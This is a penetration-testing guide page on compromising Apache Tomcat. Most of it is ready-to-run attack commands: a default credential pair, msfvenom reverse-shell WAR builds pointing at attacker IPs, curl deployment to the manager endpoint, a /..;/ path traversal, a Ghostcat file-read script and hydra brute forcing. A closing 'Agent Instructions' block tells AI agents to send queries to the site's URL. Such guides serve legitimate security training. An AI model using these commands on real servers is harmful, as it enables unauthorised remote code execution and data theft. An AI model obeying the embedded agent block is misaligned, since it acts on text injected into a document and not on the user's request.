# Apache Tomcat

## Introduction

Tomcat Manager Application is a Java-Based HTTP Web Server, that uses Web Application Archive (WAR) files. These files contain Java Servlets and JavaServer Pages(JSP) which add functionality to the application.

If an attacker gains attackers gains access to the Tomcat Manager Application due to [default credentials](https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown) `tomcat:s3cret` or weak credentials, the attacker could gain RCE by uploading a malicious WAR file.

## Reverse shell

You can use Msfvenom to create your own .war file that contains a reverse shell.

```bash
# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war
```

Then, accessing `/manager/html` you can deploy the WAR file, which once accessed you will obtain a reverse shell.

![Tomcat Manager App](/files/7UIvJNgf0jSa4mRG7ony)

### Upload via curl

If the tomcat server is **misconfigured** or you have access to the tomcat service with **localhost**, you could deploy/undeploy a reverse shell without accessing the web interface.

```bash
# Deploy
curl --user '<USER>:<PASSWORD>' --upload-file shell.war <TARGET_IP>:8080/manager/deploy?path=/shell
curl http://<TARGET_IP>:8080/shell/ # The reverse shell endpoint

# Undeploy
curl "http://<USER>:<PASSWORD>@localhost:8080/manager/text/undeploy?path=/revereshell"
```

## Tomcat path traversal

When Apache Tomcat is used together with a reverse proxy, Tomcat will treat the sequence `/..;/` as `/../` allowing the attacker to access Tomcat resources that are not normally accessible via the reverse proxy mapping.

```
https://<TARGET_IP>/manager/status/..;/html/
```

## GhosCat (CVE-2020-1938)

[CVE-2020-1938](https://github.com/00theway/Ghostcat-CNVD-2020-10487) allows an unauthenticated attacker to read web application files from a vulnerable server through port 8009.

```bash
python3 ajpShooter.py http://<TARGET_IP>:8080 8009 /WEB-INF/web.xml read
```

## Brute forcing

Use it as your last resource because you might block the account.

```bash
hydra -L <USERS.txt> -P <PASWORDS.txt> http-get://<TARGET_IP>:8080/manager/html
```

## References

* [Tomcat](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat)
* [Multiple Ways to Exploit Tomcat Manager](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/)
* [Tomcat path traversal via reverse proxy mapping](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)
* [Breaking Parser Logic!](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-pentesting-guide.marmeus.com/web/apache-tomcat.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.